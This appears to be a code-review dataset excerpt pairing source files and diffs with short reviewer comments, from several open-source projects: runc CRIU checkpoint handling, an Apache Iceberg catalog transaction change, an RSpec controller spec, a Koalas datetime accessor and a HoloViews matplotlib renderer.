inheritFd := new(criurpc.InheritFd)
inheritFd.Key = proto.String(s)
inheritFd.Fd = proto.Int32(int32(i))
req.Opts.InheritFd = append(req.Opts.InheritFd, inheritFd)
}
}
return c.criuSwrk(process, req, criuOpts, true, extraFiles)
}
func (c *linuxContainer) criuApplyCgroups(pid int, req *criurpc.CriuReq) error {
// XXX: Do we need to deal with this case? AFAIK criu still requires root.
if err := c.cgroupManager.Apply(pid); err != nil {
return err
}
if err := c.cgroupManager.Set(c.config); err != nil {
return newSystemError(err)
}
path := fmt.Sprintf("/proc/%d/cgroup", pid)
cgroupsPaths, err := cgroups.ParseCgroupFile(path)
if err != nil {
return err
}
for c, p := range cgroupsPaths {
cgroupRoot := &criurpc.CgroupRoot{
Ctrl: proto.String(c),
Path: proto.String(p),
}
req.Opts.CgRoot = append(req.Opts.CgRoot, cgroupRoot)
}
return nil
}
func (c *linuxContainer) criuSwrk(process *Process, req *criurpc.CriuReq, opts *CriuOpts, applyCgroups bool, extraFiles []*os.File) error {
fds, err := unix.Socketpair(unix.AF_LOCAL, unix.SOCK_SEQPACKET|unix.SOCK_CLOEXEC, 0)
if err != nil {
return err
}
var logPath string
if opts != nil {
logPath = filepath.Join(opts.WorkDirectory, req.GetOpts().GetLogFile())
} else {
// For the VERSION RPC 'opts' is set to 'nil' and therefore
// opts.WorkDirectory does not exist. Set logPath to "".
logPath = ""
}
criuClient := os.NewFile(uintptr(fds[0]), "criu-transport-client")
criuClientFileCon, err := net.FileConn(criuClient)
criuClient.Close()
if err != nil {
return err
}
criuClientCon := criuClientFileCon.(*net.UnixConn)
defer criuClientCon.Close()
criuServer := os.NewFile(uintptr(fds[1]), "criu-transport-server")
defer criuServer.Close()
args := []string{"swrk", "3"}
if c.criuVersion != 0 {
// If the CRIU Version is still '0' then this is probably
// the initial CRIU run to detect the version. Skip it.
logrus.Debugf("Using CRIU %d at: %s", c.criuVersion, c.criuPath)
}
logrus.Debugf("Using CRIU with following args: %s", args)
cmd := exec.Command(c.criuPath, args...)
if process != nil {
cmd.Stdin = process.Stdin
cmd.Stdout = process.Stdout
cmd.Stderr = process.Stderr
}
cmd.ExtraFiles = append(cmd.ExtraFiles, criuServer)
if extraFiles != nil {
cmd.ExtraFiles = append(cmd.ExtraFiles, extraFiles...)
}
if err := cmd.Start(); err != nil {
return err
}
// we close criuServer so that even if CRIU crashes or unexpectedly exits, runc will not hang.
criuServer.Close()
// cmd.Process will be replaced by a restored init.
criuProcess := cmd.Process
var criuProcessState *os.ProcessState
defer func() {
if criuProcessState == nil {
criuClientCon.Close()
_, err := criuProcess.Wait()
if err != nil {
logrus.Warnf("wait on criuProcess returned %v", err)
}
}
}()
if applyCgroups {
err := c.criuApplyCgroups(criuProcess.Pid, req)
if err != nil {
return err
}
}
var extFds []string
if process != nil {
extFds, err = getPipeFds(criuProcess.Pid)
if err != nil {
return err
}
}
logrus.Debugf("Using CRIU in %s mode", req.GetType().String())
// In the case of criurpc.CriuReqType_FEATURE_CHECK req.GetOpts()
// should be empty. For older CRIU versions it still will be
// available but empty. criurpc.CriuReqType_VERSION actually
// has no req.GetOpts().
if !(req.GetType() == criurpc.CriuReqType_FEATURE_CHECK ||
req.GetType() == criurpc.CriuReqType_VERSION) {
val := reflect.ValueOf(req.GetOpts())
v := reflect.Indirect(val)
for i := 0; i < v.NumField(); i++ {
st := v.Type()
name := st.Field(i).Name
if strings.HasPrefix(name, "XXX_") {
continue
}
value := val.MethodByName("Get" + name).Call([]reflect.Value{})
logrus.Debugf("CRIU option %s with value %v", name, value[0])
}
}
data, err := proto.Marshal(req)
if err != nil {
return err
}
_, err = criuClientCon.Write(data)
if err != nil {
return err
}
buf := make([]byte, 10*4096)
oob := make([]byte, 4096)
for true {
n, oobn, _, _, err := criuClientCon.ReadMsgUnix(buf, oob)
if req.Opts != nil && req.Opts.StatusFd != nil {
// Close status_fd as soon as we got something back from criu,
// assuming it has consumed (reopened) it by this time.
// Otherwise it will might be left open forever and whoever
// is waiting on it will wait forever.
fd := int(*req.Opts.StatusFd)
_ = unix.Close(fd)
req.Opts.StatusFd = nil
}
if err != nil {
return err
}
if n == 0 {
return errors.New("unexpected EOF")
}
if n == len(buf) {
return errors.New("buffer is too small")
}
resp := new(criurpc.CriuResp)
err = proto.Unmarshal(buf[:n], resp)
if err != nil {
return err
}
if !resp.GetSuccess() {
typeString := req.GetType().String()
return fmt.Errorf("criu failed: type %s errno %d\nlog file: %s", typeString, resp.GetCrErrno(), logPath)
}
t := resp.GetType()
switch {
case t == criurpc.CriuReqType_FEATURE_CHECK:
logrus.Debugf("Feature check says: %s", resp)
criuFeatures = resp.GetFeatures()
case t == criurpc.CriuReqType_NOTIFY:
if err := c.criuNotifications(resp, process, cmd, opts, extFds, oob[:oobn]); err != nil {
return err
}
t = criurpc.CriuReqType_NOTIFY
req = &criurpc.CriuReq{
Type: &t,
NotifySuccess: proto.Bool(true),
}
data, err = proto.Marshal(req)
if err != nil {
return err
}
_, err = criuClientCon.Write(data)
if err != nil {
return err
}
continue
case t == criurpc.CriuReqType_RESTORE:
case t == criurpc.CriuReqType_DUMP:
case t == criurpc.CriuReqType_PRE_DUMP:
default:
return fmt.Errorf("unable to parse the response %s", resp.String())
}
break
}
criuClientCon.CloseWrite()
// cmd.Wait() waits cmd.goroutines which are used for proxying file descriptors.
// Here we want to wait only the CRIU process.
criuProcessState, err = criuProcess.Wait()
if err != nil {
return err
}
// In pre-dump mode CRIU is in a loop and waits for
// the final DUMP command.
// The current runc pre-dump approach, however, is
// start criu in PRE_DUMP once for a single pre-dump
// and not the whole series of pre-dump, pre-dump, ...m, dump
// If we got the message CriuReqType_PRE_DUMP it means
// CRIU was successful and we need to forcefully stop CRIU
if !criuProcessState.Success() && *req.Type != criurpc.CriuReqType_PRE_DUMP {
return fmt.Errorf("criu failed: %s\nlog file: %s", criuProcessState.String(), logPath)
}
return nil
}
// block any external network activity
func lockNetwork(config *configs.Config) error {
for _, config := range config.Networks {
strategy, err := getStrategy(config.Type)
if err != nil {
return err
}
if err := strategy.detach(config); err != nil {
return err
}
}
return nil
}
func unlockNetwork(config *configs.Config) error {
for _, config := range config.Networks {
strategy, err := getStrategy(config.Type)
if err != nil {
return err
}
if err = strategy.attach(config); err != nil {
return err
}
}
return nil
}
func (c *linuxContainer) criuNotifications(resp *criurpc.CriuResp, process *Process, cmd *exec.Cmd, opts *CriuOpts, fds []string, oob []byte) error {
notify := resp.GetNotify()
if notify == nil {
return fmt.Errorf("invalid response: %s", resp.String())
}
logrus.Debugf("notify: %s\n", notify.GetScript())
switch {
case notify.GetScript() == "post-dump":
f, err := os.Create(filepath.Join(c.root, "checkpoint"))
if err != nil {
return err
}
f.Close()
case notify.GetScript() == "network-unlock":
if err := unlockNetwork(c.config); err != nil {
return err
}
case notify.GetScript() == "network-lock":
if err := lockNetwork(c.config); err != nil {
return err
}
case notify.GetScript() == "setup-namespaces":
if c.config.Hooks != nil {
s, err := c.currentOCIState()
if err != nil {
return nil
}
s.Pid = int(notify.GetPid())
for i, hook := range c.config.Hooks.Prestart {
if err := hook.Run(s); err != nil {
return newSystemErrorWithCausef(err, "running prestart hook %d", i)
}
}
}
case notify.GetScript() == "post-restore":
pid := notify.GetPid()
p, err := os.FindProcess(int(pid))
if err != nil {
return err
}
cmd.Process = p
r, err := newRestoredProcess(cmd, fds)
if err != nil {
return err
}
process.ops = r
if err := c.state.transition(&restoredState{
imageDir: opts.ImagesDirectory,
c: c,
}); err != nil {
return err
}
// create a timestamp indicating when the restored checkpoint was started
c.created = time.Now().UTC()
if _, err := c.updateState(r); err != nil {
return err
}
if err := os.Remove(filepath.Join(c.root, "checkpoint")); err != nil {
if !os.IsNotExist(err) {
logrus.Error(err)
}
}
case notify.GetScript() == "orphan-pts-master":
scm, err := unix.ParseSocketControlMessage(oob)
if err != nil {
return err
}
fds, err := unix.ParseUnixRights(&scm[0])
if err != nil {
return err
}
master := os.NewFile(uintptr(fds[0]), "orphan-pts-master")
defer master.Close()
// While we can access console.master, using the API is a good idea.
if err := utils.SendFd(process.ConsoleSocket, master.Name(), master.Fd()); err != nil {
return err
}
}
return nil
}
func (c *linuxContainer) updateState(process parentProcess) (*State, error) {
if process != nil {
c.initProcess = process
}
state, err := c.currentState()
if err != nil {
return nil, err
}
err = c.saveState(state)
if err != nil {
return nil, err
}
return state, nil
}
func (c *linuxContainer) saveState(s *State) error {
f, err := os.Create(filepath.Join(c.root, stateFilename))
if err != nil {
return err
}
defer f.Close()
return utils.WriteJSON(f, s)
}
func (c *linuxContainer) deleteState() error {
return os.Remove(filepath.Join(c.root, stateFilename))
}
func (c *linuxContainer) currentStatus() (Status, error) {
if err := c.refreshState(); err != nil {
return -1, err
}
return c.state.status(), nil
}
// refreshState needs to be called to verify that the current state on the
// container is what is true. Because consumers of libcontainer can use it
// out of process we need to verify the container's status based on runtime
// information and not rely on our in process info.
func (c *linuxContainer) refreshState() error {
paused, err := c.isPaused()
if err != nil {
return err
}
if paused {
return c.state.transition(&pausedState{c: c})
}
t := c.runType()
switch t {
case Created:
return c.state.transition(&createdState{c: c})
case Running:
return c.state.transition(&runningState{c: c})
}
return c.state.transition(&stoppedState{c: c})
}
func (c *linuxContainer) runType() Status {
if c.initProcess == nil {
return Stopped
}
pid := c.initProcess.pid()
stat, err := system.Stat(pid)
if err != nil {
return Stopped
}
if stat.StartTime != c.initProcessStartTime || stat.State == system.Zombie || stat.State == system.Dead {
return Stopped
}
// We'll create exec fifo and blocking on it after container is created,
// and delete it after start container.
if _, err := os.Stat(filepath.Join(c.root, execFifoFilename)); err == nil {
return Created
}
return Running
}
func (c *linuxContainer) isPaused() (bool, error) {
state, err := c.cgroupManager.GetFreezerState()
if err != nil {
return false, err
}
return state == configs.Frozen, nil
}
func (c *linuxContainer) currentState() (*State, error) {
var (
startTime uint64
externalDescriptors []string
pid = -1
)
if c.initProcess != nil {
pid = c.initProcess.pid()
startTime, _ = c.initProcess.startTime()
externalDescriptors = c.initProcess.externalDescriptors()
}
intelRdtPath, err := intelrdt.GetIntelRdtPath(c.ID())
if err != nil {
intelRdtPath = ""
}
state := &State{
BaseState: BaseState{
ID: c.ID(),
Config: *c.config,
InitProcessPid: pid,
InitProcessStartTime: startTime,
Created: c.created,
},
Rootless: c.config.RootlessEUID && c.config.RootlessCgroups,
CgroupPaths: c.cgroupManager.GetPaths(),
IntelRdtPath: intelRdtPath,
NamespacePaths: make(map[configs.NamespaceType]string),
ExternalDescriptors: externalDescriptors,
}
if pid > 0 {
for _, ns := range c.config.Namespaces {
state.NamespacePaths[ns.Type] = ns.GetPath(pid)
}
for _, nsType := range configs.NamespaceTypes() {
if !configs.IsNamespaceSupported(nsType) {
continue
}
if _, ok := state.NamespacePaths[nsType]; !ok {
ns := configs.Namespace{Type: nsType}
state.NamespacePaths[ns.Type] = ns.GetPath(pid)
}
}
}
return state, nil
}
func (c *linuxContainer) currentOCIState() (*specs.State, error) {
bundle, annotations := utils.Annotations(c.config.Labels)
state := &specs.State{
Version: specs.Version,
ID: c.ID(),
Bundle: bundle,
Annotations: annotations,
}
status, err := c.currentStatus()
if err != nil {
return nil, err
}
state.Status = status.String()
if status != Stopped {
if c.initProcess != nil {
state.Pid = c.initProcess.pid()
}
}
return state, nil
}
// orderNamespacePaths sorts namespace paths into a list of paths that we
// can setns in order.
func (c *linuxContainer) orderNamespacePaths(namespaces map[configs.NamespaceType]string) ([]string, error) {
paths := []string{}
for _, ns := range configs.NamespaceTypes() {
// Remove namespaces that we don't need to join.
if !c.config.Namespaces.Contains(ns) {
continue
}
if p, ok := namespaces[ns]; ok && p != "" {
// check if the requested namespace is supported
if !configs.IsNamespaceSupported(ns) {
return nil, newSystemError(fmt.Errorf("namespace %s is not supported", ns))
}
// only set to join this namespace if it exists
if _, err := os.Lstat(p); err != nil {
return nil, newSystemErrorWithCausef(err, "running lstat on namespace path %q", p)
}
// do not allow namespace path with comma as we use it to separate
// the namespace paths
if strings.ContainsRune(p, ',') {
return nil, newSystemError(fmt.Errorf("invalid path %s", p))
}
paths = append(paths, fmt.Sprintf("%s:%s", configs.NsName(ns), p))
}
}
return paths, nil
}
func encodeIDMapping(idMap []configs.IDMap) ([]byte, error) {
data := bytes.NewBuffer(nil)
for _, im := range idMap {
line := fmt.Sprintf("%d %d %d\n", im.ContainerID, im.HostID, im.Size)
if _, err := data.WriteString(line); err != nil {
return nil, err
}
}
return data.Bytes(), nil
}
// bootstrapData encodes the necessary data in netlink binary format
// as a io.Reader.
// Consumer can write the data to a bootstrap program
// such as one that uses nsenter package to bootstrap the container's
// init process correctly, i.e. with correct namespaces, uid/gid
// mapping etc.
func (c *linuxContainer) bootstrapData(cloneFlags uintptr, nsMaps map[configs.NamespaceType]string) (io.Reader, error) {
// create the netlink message
r := nl.NewNetlinkRequest(int(InitMsg), 0)
// write cloneFlags
r.AddData(&Int32msg{
Type: CloneFlagsAttr,
Value: uint32(cloneFlags),
})
// write custom namespace paths
if len(nsMaps) > 0 {
nsPaths, err := c.orderNamespacePaths(nsMaps)
if err != nil {
return nil, err
}
r.AddData(&Bytemsg{
Type: NsPathsAttr,
Value: []byte(strings.Join(nsPaths, ",")),
})
}
// write namespace paths only when we are not joining an existing user ns
_, joinExistingUser := nsMaps[configs.NEWUSER]
if !joinExistingUser {
// write uid mappings
if len(c.config.UidMappings) > 0 {
if c.config.RootlessEUID && c.newuidmapPath != "" {
r.AddData(&Bytemsg{
Type: UidmapPathAttr,
Value: []byte(c.newuidmapPath),
})
}
b, err := encodeIDMapping(c.config.UidMappings)
if err != nil {
return nil, err
}
r.AddData(&Bytemsg{
Type: UidmapAttr,
Value: b,
})
}
// write gid mappings
if len(c.config.GidMappings) > 0 {
b, err := encodeIDMapping(c.config.GidMappings)
if err != nil {
return nil, err
}
r.AddData(&Bytemsg{
Type: GidmapAttr,
Value: b,
})
if c.config.RootlessEUID && c.newgidmapPath != "" {
r.AddData(&Bytemsg{
Type: GidmapPathAttr,
Value: []byte(c.newgidmapPath),
})
}
if requiresRootOrMappingTool(c.config) {
r.AddData(&Boolmsg{
Type: SetgroupAttr,
Value: true,
})
}
}
}
if c.config.OomScoreAdj != nil {
// write oom_score_adj
r.AddData(&Bytemsg{
Type: OomScoreAdjAttr,
Value: []byte(fmt.Sprintf("%d", *c.config.OomScoreAdj)),
})
}
// write rootless
r.AddData(&Boolmsg{
Type: RootlessEUIDAttr,
Value: c.config.RootlessEUID,
})
return bytes.NewReader(r.Serialize()), nil
}
// ignoreTerminateErrors returns nil if the given err matches an error known
// to indicate that the terminate occurred successfully or err was nil, otherwise
// err is returned unaltered.
func ignoreTerminateErrors(err error) error {
if err == nil {
return nil
}
s := err.Error()
switch {
case strings.Contains(s, "process already finished"), strings.Contains(s, "Wait was already called"):
return nil
}
return err
}
func requiresRootOrMappingTool(c *configs.Config) bool {
gidMap := []configs.IDMap{
{ContainerID: 0, HostID: os.Getegid(), Size: 1},
}
return !reflect.DeepEqual(c.GidMappings, gidMap)
}
| 1 | 19,361 | Does it make sense to check for "Created" here as well? Or should it return an error in such case? | opencontainers-runc | go |
@@ -93,7 +93,7 @@ public abstract class BaseMetastoreCatalog implements Catalog {
String baseLocation = location != null ? location : defaultWarehouseLocation(identifier);
Map<String, String> tableProperties = properties != null ? properties : Maps.newHashMap();
TableMetadata metadata = TableMetadata.newTableMetadata(schema, spec, baseLocation, tableProperties);
- return Transactions.createTableTransaction(ops, metadata);
+ return Transactions.createTableTransaction(identifier.name(), ops, metadata);
}
@Override | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.iceberg;
import com.google.common.base.Joiner;
import com.google.common.base.Preconditions;
import com.google.common.collect.Iterables;
import com.google.common.collect.MapMaker;
import com.google.common.collect.Maps;
import com.google.common.collect.Sets;
import java.io.IOException;
import java.util.Map;
import java.util.Set;
import org.apache.iceberg.catalog.Catalog;
import org.apache.iceberg.catalog.TableIdentifier;
import org.apache.iceberg.exceptions.AlreadyExistsException;
import org.apache.iceberg.exceptions.CommitFailedException;
import org.apache.iceberg.exceptions.NoSuchTableException;
import org.apache.iceberg.exceptions.RuntimeIOException;
import org.apache.iceberg.io.FileIO;
import org.apache.iceberg.util.Tasks;
import org.apache.iceberg.util.ThreadPools;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public abstract class BaseMetastoreCatalog implements Catalog {
private static final Logger LOG = LoggerFactory.getLogger(BaseMetastoreCatalog.class);
@Override
public Table createTable(
TableIdentifier identifier,
Schema schema,
PartitionSpec spec,
String location,
Map<String, String> properties) {
Preconditions.checkArgument(isValidIdentifier(identifier), "Invalid table identifier: %s", identifier);
TableOperations ops = newTableOps(identifier);
if (ops.current() != null) {
throw new AlreadyExistsException("Table already exists: " + identifier);
}
String baseLocation;
if (location != null) {
baseLocation = location;
} else {
baseLocation = defaultWarehouseLocation(identifier);
}
TableMetadata metadata = TableMetadata.newTableMetadata(
schema, spec, baseLocation, properties == null ? Maps.newHashMap() : properties);
ops.commit(null, metadata);
try {
return new BaseTable(ops, fullTableName(name(), identifier));
} catch (CommitFailedException ignored) {
throw new AlreadyExistsException("Table was created concurrently: " + identifier);
}
}
@Override
public Transaction newCreateTableTransaction(
TableIdentifier identifier,
Schema schema,
PartitionSpec spec,
String location,
Map<String, String> properties) {
Preconditions.checkArgument(isValidIdentifier(identifier), "Invalid table identifier: %s", identifier);
TableOperations ops = newTableOps(identifier);
if (ops.current() != null) {
throw new AlreadyExistsException("Table already exists: " + identifier);
}
String baseLocation = location != null ? location : defaultWarehouseLocation(identifier);
Map<String, String> tableProperties = properties != null ? properties : Maps.newHashMap();
TableMetadata metadata = TableMetadata.newTableMetadata(schema, spec, baseLocation, tableProperties);
return Transactions.createTableTransaction(ops, metadata);
}
@Override
public Transaction newReplaceTableTransaction(
TableIdentifier identifier,
Schema schema,
PartitionSpec spec,
String location,
Map<String, String> properties,
boolean orCreate) {
TableOperations ops = newTableOps(identifier);
if (!orCreate && ops.current() == null) {
throw new NoSuchTableException("No such table: " + identifier);
}
String baseLocation = location != null ? location : defaultWarehouseLocation(identifier);
Map<String, String> tableProperties = properties != null ? properties : Maps.newHashMap();
TableMetadata metadata = TableMetadata.newTableMetadata(schema, spec, baseLocation, tableProperties);
if (orCreate) {
return Transactions.createOrReplaceTableTransaction(ops, metadata);
} else {
return Transactions.replaceTableTransaction(ops, metadata);
}
}
@Override
public Table loadTable(TableIdentifier identifier) {
if (isValidIdentifier(identifier)) {
TableOperations ops = newTableOps(identifier);
if (ops.current() == null) {
// the identifier may be valid for both tables and metadata tables
if (isValidMetadataIdentifier(identifier)) {
return loadMetadataTable(identifier);
}
throw new NoSuchTableException("Table does not exist: %s", identifier);
}
return new BaseTable(ops, fullTableName(name(), identifier));
} else if (isValidMetadataIdentifier(identifier)) {
return loadMetadataTable(identifier);
} else {
throw new NoSuchTableException("Invalid table identifier: %s", identifier);
}
}
private Table loadMetadataTable(TableIdentifier identifier) {
String name = identifier.name();
MetadataTableType type = MetadataTableType.from(name);
if (type != null) {
TableIdentifier baseTableIdentifier = TableIdentifier.of(identifier.namespace().levels());
TableOperations ops = newTableOps(baseTableIdentifier);
if (ops.current() == null) {
throw new NoSuchTableException("Table does not exist: " + baseTableIdentifier);
}
Table baseTable = new BaseTable(ops, fullTableName(name(), baseTableIdentifier));
switch (type) {
case ENTRIES:
return new ManifestEntriesTable(ops, baseTable);
case FILES:
return new DataFilesTable(ops, baseTable);
case HISTORY:
return new HistoryTable(ops, baseTable);
case SNAPSHOTS:
return new SnapshotsTable(ops, baseTable);
case MANIFESTS:
return new ManifestsTable(ops, baseTable);
case PARTITIONS:
return new PartitionsTable(ops, baseTable);
case ALL_DATA_FILES:
return new AllDataFilesTable(ops, baseTable);
case ALL_MANIFESTS:
return new AllManifestsTable(ops, baseTable);
case ALL_ENTRIES:
return new AllEntriesTable(ops, baseTable);
default:
throw new NoSuchTableException("Unknown metadata table type: %s for %s", type, baseTableIdentifier);
}
} else {
throw new NoSuchTableException("Table does not exist: " + identifier);
}
}
private boolean isValidMetadataIdentifier(TableIdentifier identifier) {
return MetadataTableType.from(identifier.name()) != null &&
isValidIdentifier(TableIdentifier.of(identifier.namespace().levels()));
}
protected boolean isValidIdentifier(TableIdentifier tableIdentifier) {
// by default allow all identifiers
return true;
}
@Override
public String toString() {
return getClass().getSimpleName() + "(" + name() + ")";
}
protected abstract String name();
protected abstract TableOperations newTableOps(TableIdentifier tableIdentifier);
protected abstract String defaultWarehouseLocation(TableIdentifier tableIdentifier);
/**
* Drops all data and metadata files referenced by TableMetadata.
* <p>
* This should be called by dropTable implementations to clean up table files once the table has been dropped in the
* metastore.
*
* @param io a FileIO to use for deletes
* @param metadata the last valid TableMetadata instance for a dropped table.
*/
protected static void dropTableData(FileIO io, TableMetadata metadata) {
// Reads and deletes are done using Tasks.foreach(...).suppressFailureWhenFinished to complete
// as much of the delete work as possible and avoid orphaned data or manifest files.
Set<String> manifestListsToDelete = Sets.newHashSet();
Set<ManifestFile> manifestsToDelete = Sets.newHashSet();
for (Snapshot snapshot : metadata.snapshots()) {
manifestsToDelete.addAll(snapshot.manifests());
// add the manifest list to the delete set, if present
if (snapshot.manifestListLocation() != null) {
manifestListsToDelete.add(snapshot.manifestListLocation());
}
}
LOG.info("Manifests to delete: {}", Joiner.on(", ").join(manifestsToDelete));
// run all of the deletes
deleteFiles(io, manifestsToDelete);
Tasks.foreach(Iterables.transform(manifestsToDelete, ManifestFile::path))
.noRetry().suppressFailureWhenFinished()
.onFailure((manifest, exc) -> LOG.warn("Delete failed for manifest: {}", manifest, exc))
.run(io::deleteFile);
Tasks.foreach(manifestListsToDelete)
.noRetry().suppressFailureWhenFinished()
.onFailure((list, exc) -> LOG.warn("Delete failed for manifest list: {}", list, exc))
.run(io::deleteFile);
Tasks.foreach(metadata.file().location())
.noRetry().suppressFailureWhenFinished()
.onFailure((list, exc) -> LOG.warn("Delete failed for metadata file: {}", list, exc))
.run(io::deleteFile);
}
private static void deleteFiles(FileIO io, Set<ManifestFile> allManifests) {
// keep track of deleted files in a map that can be cleaned up when memory runs low
Map<String, Boolean> deletedFiles = new MapMaker()
.concurrencyLevel(ThreadPools.WORKER_THREAD_POOL_SIZE)
.weakKeys()
.makeMap();
Tasks.foreach(allManifests)
.noRetry().suppressFailureWhenFinished()
.executeWith(ThreadPools.getWorkerPool())
.onFailure((item, exc) -> LOG.warn("Failed to get deleted files: this may cause orphaned data files", exc))
.run(manifest -> {
try (ManifestReader reader = ManifestFiles.read(manifest, io)) {
for (ManifestEntry entry : reader.entries()) {
// intern the file path because the weak key map uses identity (==) instead of equals
String path = entry.file().path().toString().intern();
Boolean alreadyDeleted = deletedFiles.putIfAbsent(path, true);
if (alreadyDeleted == null || !alreadyDeleted) {
try {
io.deleteFile(path);
} catch (RuntimeException e) {
// this may happen if the map of deleted files gets cleaned up by gc
LOG.warn("Delete failed for data file: {}", path, e);
}
}
}
} catch (IOException e) {
throw new RuntimeIOException(e, "Failed to read manifest file: " + manifest.path());
}
});
}
private static String fullTableName(String catalogName, TableIdentifier identifier) {
StringBuilder sb = new StringBuilder();
if (catalogName.contains("/") || catalogName.contains(":")) {
// use / for URI-like names: thrift://host:port/db.table
sb.append(catalogName);
if (!catalogName.endsWith("/")) {
sb.append("/");
}
} else {
// use . for non-URI named catalogs: prod.db.table
sb.append(catalogName).append(".");
}
for (String level : identifier.namespace().levels()) {
sb.append(level).append(".");
}
sb.append(identifier.name());
return sb.toString();
}
}
| 1 | 19,559 | Did you mean to use `identifier.toString` here as well? | apache-iceberg | java |
@@ -1,6 +1,6 @@
-require 'spec_helper'
+require "rails_helper"
-describe Api::V1::UsersController, '#show' do
+describe Api::V1::UsersController, "#show", type: :controller do
it 'returns a 401 when users are not authenticated' do
get :show
expect(response.code).to eq "401" | 1 | require 'spec_helper'
describe Api::V1::UsersController, '#show' do
it 'returns a 401 when users are not authenticated' do
get :show
expect(response.code).to eq "401"
end
end
| 1 | 10,657 | interesting! didn't realize this was needed in RSpec 3 | thoughtbot-upcase | rb |
@@ -27,7 +27,7 @@ from databricks.koalas.base import _wrap_accessor_pandas, _wrap_accessor_spark
class DatetimeMethods(object):
"""Date/Time methods for Koalas Series"""
- def __init__(self, series: ks.Series):
+ def __init__(self, series: 'ks.Series'):
if not isinstance(series.spark_type, (DateType, TimestampType)):
raise ValueError(
"Cannot call DatetimeMethods on type {}" | 1 | #
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Date/Time related functions on Koalas Series
"""
import pandas as pd
import pyspark.sql.functions as F
from pyspark.sql.types import DateType, TimestampType, LongType, StringType
import databricks.koalas as ks
from databricks.koalas.base import _wrap_accessor_pandas, _wrap_accessor_spark
class DatetimeMethods(object):
"""Date/Time methods for Koalas Series"""
def __init__(self, series: ks.Series):
if not isinstance(series.spark_type, (DateType, TimestampType)):
raise ValueError(
"Cannot call DatetimeMethods on type {}"
.format(series.spark_type))
self._data = series
self.name = self._data.name
# Properties
@property
def date(self) -> ks.Series:
"""
Returns a Series of python datetime.date objects (namely, the date
part of Timestamps without timezone information).
"""
# TODO: Hit a weird exception
# syntax error in attribute name: `to_date(`start_date`)` with alias
return _wrap_accessor_spark(
self, lambda col: F.to_date(col)).alias(self.name)
@property
def time(self) -> ks.Series:
raise NotImplementedError()
@property
def timetz(self) -> ks.Series:
raise NotImplementedError()
@property
def year(self) -> ks.Series:
"""
The year of the datetime.
`"""
return _wrap_accessor_spark(self, F.year, LongType()).alias(self.name)
@property
def month(self) -> ks.Series:
"""
The month of the timestamp as January = 1 December = 12.
"""
return _wrap_accessor_spark(self, F.month, LongType()).alias(self.name)
@property
def day(self) -> ks.Series:
"""
The days of the datetime.
"""
return _wrap_accessor_spark(
self, F.dayofmonth, LongType()).alias(self.name)
@property
def hour(self) -> ks.Series:
"""
The hours of the datetime.
"""
return _wrap_accessor_spark(self, F.hour, LongType()).alias(self.name)
@property
def minute(self) -> ks.Series:
"""
The minutes of the datetime.
"""
return _wrap_accessor_spark(self, F.minute, LongType()).alias(self.name)
@property
def second(self) -> ks.Series:
"""
The seconds of the datetime.
"""
return _wrap_accessor_spark(self, F.second, LongType()).alias(self.name)
@property
def millisecond(self) -> ks.Series:
"""
The milliseconds of the datetime.
"""
return _wrap_accessor_pandas(
self, lambda x: x.dt.millisecond, LongType()).alias(self.name)
@property
def microsecond(self) -> ks.Series:
"""
The microseconds of the datetime.
"""
return _wrap_accessor_pandas(
self, lambda x: x.dt.microsecond, LongType()).alias(self.name)
@property
def nanosecond(self) -> ks.Series:
raise NotImplementedError()
@property
def week(self) -> ks.Series:
"""
The week ordinal of the year.
"""
return _wrap_accessor_spark(self, F.weekofyear, LongType()).alias(self.name)
@property
def weekofyear(self) -> ks.Series:
return self.week
weekofyear.__doc__ = week.__doc__
@property
def dayofweek(self) -> ks.Series:
"""
The day of the week with Monday=0, Sunday=6.
Return the day of the week. It is assumed the week starts on
Monday, which is denoted by 0 and ends on Sunday which is denoted
by 6. This method is available on both Series with datetime
values (using the `dt` accessor) or DatetimeIndex.
Returns
-------
Series or Index
Containing integers indicating the day number.
See Also
--------
Series.dt.dayofweek : Alias.
Series.dt.weekday : Alias.
Series.dt.day_name : Returns the name of the day of the week.
Examples
--------
>>> s = ks.from_pandas(pd.date_range('2016-12-31', '2017-01-08', freq='D').to_series())
>>> s.dt.dayofweek
2016-12-31 5
2017-01-01 6
2017-01-02 0
2017-01-03 1
2017-01-04 2
2017-01-05 3
2017-01-06 4
2017-01-07 5
2017-01-08 6
Name: 0, dtype: int64
"""
return _wrap_accessor_pandas(
self, lambda s: s.dt.dayofweek, LongType()).alias(self._data.name)
@property
def weekday(self) -> ks.Series:
return self.dayofweek
weekday.__doc__ = dayofweek.__doc__
@property
def dayofyear(self) -> ks.Series:
"""
The ordinal day of the year.
"""
return _wrap_accessor_pandas(
self, lambda s: s.dt.dayofyear, LongType()).alias(self._data.name)
# Methods
def strftime(self, date_format) -> ks.Series:
"""
Convert to a String Series using specified date_format.
"""
return _wrap_accessor_pandas(
self,
lambda x: x.dt.strftime(date_format),
StringType()
).alias(self.name)
| 1 | 9,779 | This is to avoid circular reference | databricks-koalas | py |
@@ -93,6 +93,9 @@ class MPLRenderer(Renderer):
'nbagg': (NbAggJupyterComm, None),
'mpld3': (JupyterComm, mpld3_msg_handler)}
+ # Whether in a notebook context
+ _notebook = False
+
def __call__(self, obj, fmt='auto'):
"""
Render the supplied HoloViews component or MPLPlot instance | 1 | import sys
from io import BytesIO
from tempfile import NamedTemporaryFile
from contextlib import contextmanager
from itertools import chain
import matplotlib as mpl
from matplotlib import pyplot as plt
from matplotlib.transforms import Bbox, TransformedBbox, Affine2D
import param
from param.parameterized import bothmethod
from ...core import HoloMap
from ...core.options import Store
